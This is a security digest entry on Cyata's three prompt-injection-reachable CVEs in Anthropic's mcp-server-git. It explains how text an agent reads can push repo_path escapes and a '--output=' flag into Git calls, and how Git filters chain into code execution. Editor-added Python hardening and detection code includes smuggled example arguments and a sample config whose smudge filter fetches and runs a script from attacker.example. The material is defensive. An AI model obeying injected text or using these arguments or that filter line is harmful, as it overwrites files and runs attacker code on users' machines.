Cyata — Prompt-injection reachable CVEs in Anthropic’s official Git MCP server

• Category: AI CVEs

AI relevance: This is a concrete example of how “agent + tools” stacks turn prompt injection into real filesystem and code impact via MCP tool calls and cross-tool chaining.

  • Cyata reports three vulnerabilities in mcp-server-git (Anthropic’s reference Git server for MCP) that are reachable whenever an attacker can influence what the assistant reads (e.g., README, issue text or webpage content that gets pulled into context).
  • The core pattern: the server trusts attacker-influenced tool arguments (notably repo_path) and forwards them into Git operations without confining them.
  • CVE-2025-68145 (path validation bypass): lets an attacker direct operations to arbitrary directories/repositories on the host, not just the configured repo.
  • CVE-2025-68143 (unrestricted git_init): enables initializing Git repos in arbitrary directories, a stepping stone to getting files from those directories read into model context.
  • CVE-2025-68144 (argument injection in git_diff): an attacker-controlled value such as --output=... is parsed by Git as an option and can overwrite arbitrary files (effectively deleting or corrupting them).
  • Cyata also demonstrates a code execution chain when Git is combined with a file-writing capability (e.g., a filesystem MCP server or IDE write APIs), via Git’s clean/smudge filters configured in .git/config.
  • Notably, the write-up emphasizes that this works “out of the box” on default installs prior to the fix, making it a practical operational risk rather than a lab curiosity.
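The trusting pattern the bullets above describe, beside a confined version, as an added illustration by the editor (not code from mcp-server-git or from Cyata’s write-up). The handler names, the ALLOWED_ROOT path and the example inputs are constructed for the demonstration; the functions only build Git’s argv and never run Git.

```python
from __future__ import annotations

from pathlib import Path

# Constructed: the single repository root the server was started with.
ALLOWED_ROOT = Path("/srv/agent/repos")


def naive_git_diff_argv(repo_path: str, target: str) -> list[str]:
    """The vulnerable pattern: model-supplied tool arguments go straight into
    git's argv. A target of '--output=<file>' is parsed by git as an option, so
    the diff is written over <file>; a repo_path outside the configured root
    points git at an arbitrary directory on the host."""
    return ["git", "-C", repo_path, "diff", target]


def confine_repo_path(repo_path: str, root: Path = ALLOWED_ROOT) -> Path:
    """Resolve repo_path (absolute, or relative to root) and require that it
    stays inside root. resolve() normalises '..' segments and follows any
    symlink that exists, so a link planted inside the root that points
    elsewhere is caught too. Comparing against parents (not a string prefix)
    keeps '/srv/agent/repos-other' out. Raises ValueError on escape."""
    root_resolved = root.resolve()
    raw = Path(repo_path)
    candidate = (raw if raw.is_absolute() else root_resolved / raw).resolve()
    if candidate != root_resolved and root_resolved not in candidate.parents:
        raise ValueError(f"repo_path {repo_path!r} escapes {root_resolved}")
    return candidate


def reject_option_like(value: str, name: str) -> str:
    """Refuse any value git could read as an option; revisions and pathspecs
    never legitimately start with '-'."""
    if value.startswith("-"):
        raise ValueError(f"{name} {value!r} looks like a git option")
    if "\0" in value:
        raise ValueError(f"{name} contains a NUL byte")
    return value


def hardened_git_diff_argv(repo_path: str, target: str) -> list[str]:
    """Confined form: repo_path must resolve under ALLOWED_ROOT, the revision
    must not look like an option, and a trailing '--' marks the end of option
    parsing ('git diff <rev> --' is the accepted form)."""
    repo = confine_repo_path(repo_path)
    rev = reject_option_like(target, "target")
    return ["git", "-C", str(repo), "diff", rev, "--"]


def hardened_git_init_argv(repo_path: str) -> list[str]:
    """Same confinement for git_init, so repositories can only be created
    under the configured root rather than in arbitrary directories."""
    repo = confine_repo_path(repo_path)
    return ["git", "init", "--", str(repo)]


if __name__ == "__main__":
    # Constructed inputs of the kind an injected README could steer the model into.
    print(naive_git_diff_argv("/srv/agent/repos/app", "--output=/home/agent/.bashrc"))
    for fn, args in [
        (hardened_git_diff_argv, ("app", "--output=/home/agent/.bashrc")),
        (hardened_git_diff_argv, ("../../etc", "HEAD~1")),
        (hardened_git_init_argv, ("/tmp/planted",)),
        (hardened_git_diff_argv, ("app", "HEAD~1")),
    ]:
        try:
            print("accepted:", fn(*args))
        except ValueError as exc:
            print("rejected:", exc)
```

The two checks are independent: path confinement stops CVE-2025-68145/68143-style redirection of the operation, and the option check plus `--` stops the CVE-2025-68144-style flag smuggling even for a repo that is inside the root.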

Why it matters

  • “Prompt injection” stops being a purely model-level problem once tools exist: it becomes argument injection into privileged automation.
  • MCP increases composability: Git + filesystem (or any writer) becomes a high-risk pairing because it enables multi-step exploit chains.
  • If your assistant ingests untrusted text (issues, PR descriptions, docs, web pages), treat it like user-controlled input to privileged functions.

What to do

  • Patch: update mcp-server-git to a fixed release (Cyata cites 2025.12.18+).
  • Reduce tool blast radius: do not run Git + filesystem write tools together unless you must; scope filesystem servers to a minimal allowlist path.
  • Constrain tool arguments: enforce server-side validation so parameters like repo_path cannot escape configured roots and free-form values (revisions, paths) cannot be interpreted as Git options.
  • Harden “tooling features”: consider blocking Git features that spawn shell commands (filters/hooks) in automated agent workflows, or run them inside a sandboxed runner/container.
  • Detection: monitor for unexpected .git/ directories created outside repos and for suspicious Git config keys (e.g., filter.*.clean/smudge).
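A detection sweep for the two traces named in the last bullet (rogue .git directories and command-executing Git config keys), as an added illustration by the editor, not code from the Cyata write-up or from mcp-server-git. It goes slightly beyond the bullet: besides filter.*.clean/smudge it flags other config keys whose values Git executes (hooks path, fsmonitor, textconv, merge drivers, ssh command, and “!”-prefixed aliases and credential helpers), which is the editor’s assumption and not an exhaustive list. The allowlist of known filter programs and the sample config are constructed.

```python
# Editor's added example; key list, allowlist and sample config are constructed.
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Keys git runs as commands. filter.*.clean/smudge is the channel from the
# write-up; the others are editor-added (assumption, not an exhaustive list).
EXEC_KEY_PATTERNS = [
    re.compile(r"^filter\.[^.]+\.(clean|smudge|process)$"),
    re.compile(r"^diff\.[^.]+\.(textconv|command)$"),
    re.compile(r"^merge\.[^.]+\.driver$"),
    re.compile(r"^core\.(hookspath|fsmonitor|sshcommand|pager|editor|askpass)$"),
]
# Keys that execute only when the value starts with '!'.
SHELL_PREFIX_KEYS = [re.compile(r"^alias\."), re.compile(r"^credential\.(.+\.)?helper$")]
KNOWN_FILTER_PROGRAMS = ("git-lfs",)  # constructed allowlist for your fleet

_SECTION = re.compile(r'^\[([\w.-]+)(?:\s+"((?:[^"\\]|\\.)*)")?\]$')
_ENTRY = re.compile(r"^([A-Za-z][\w-]*)\s*(?:=\s*(.*))?$")


def parse_git_config(text: str) -> dict[str, str]:
    """Flatten a git config into {'section.subsection.key': value}. Section and
    key names are case-insensitive in git and are lowered; subsections keep
    their case. Hand-rolled because configparser treats git's tab-indented
    entries as continuation lines."""
    entries: dict[str, str] = {}
    prefix = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        sec = _SECTION.match(line)
        if sec:
            name, sub = sec.group(1).lower(), sec.group(2)
            prefix = f"{name}.{sub}." if sub is not None else f"{name}."
            continue
        ent = _ENTRY.match(line)
        if ent and prefix:  # a bare key with no '=' means boolean true in git
            entries[prefix + ent.group(1).lower()] = (ent.group(2) or "true").strip()
    return entries


def suspicious_keys(config: dict[str, str]) -> list[tuple[str, str]]:
    """(key, value) pairs git would execute, minus filters from known programs."""
    hits = []
    for key, value in config.items():
        if any(p.match(key) for p in EXEC_KEY_PATTERNS):
            if key.startswith("filter.") and value.startswith(KNOWN_FILTER_PROGRAMS):
                continue
            hits.append((key, value))
        elif value.startswith("!") and any(p.match(key) for p in SHELL_PREFIX_KEYS):
            hits.append((key, value))
    return hits


def find_git_dirs(root) -> list[Path]:
    # Every .git directory under root, without descending into them.
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        if ".git" in dirnames:
            found.append(Path(dirpath) / ".git")
            dirnames.remove(".git")
    return found


def scan_tree(root, allowed_repos: set[Path]) -> list[str]:
    """Flag repos outside the allowlist and exec-capable keys in any .git/config."""
    findings = []
    for git_dir in find_git_dirs(root):
        repo = git_dir.parent.resolve()
        if repo not in allowed_repos:
            findings.append(f"unexpected repository: {repo}")
        cfg = git_dir / "config"
        if cfg.is_file():
            for key, value in suspicious_keys(parse_git_config(cfg.read_text())):
                findings.append(f"{cfg}: {key} = {value}")
    return findings


# Constructed sample: a config a misused write tool could have planted under $HOME.
SAMPLE_CONFIG = """[core]
\tfilemode = true
[filter "lfs"]
\tclean = git-lfs clean -- %f
\tsmudge = git-lfs smudge -- %f
[filter "rce"]
\tsmudge = sh -c 'curl -s http://attacker.example/p | sh'
\trequired = true
"""


def demo_scan() -> list[str]:
    """Build a throwaway tree with one allowlisted repo and one rogue .git."""
    with tempfile.TemporaryDirectory() as tmp:
        rogue = Path(tmp) / "home" / "agent" / ".git"
        rogue.mkdir(parents=True)
        (rogue / "config").write_text(SAMPLE_CONFIG)
        ok = Path(tmp) / "repos" / "app" / ".git"
        ok.mkdir(parents=True)
        (ok / "config").write_text("[core]\n\tbare = false\n")
        return scan_tree(tmp, {ok.parent.resolve()})


if __name__ == "__main__":
    print("\n".join(demo_scan()))
```

Run it periodically over the agent’s home and workspace directories, or wire the same checks into file-integrity monitoring on `.git/config` writes. The allowlist matters in practice: git-lfs repositories legitimately carry clean/smudge filters, so alerting on every filter key would drown the signal.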

Links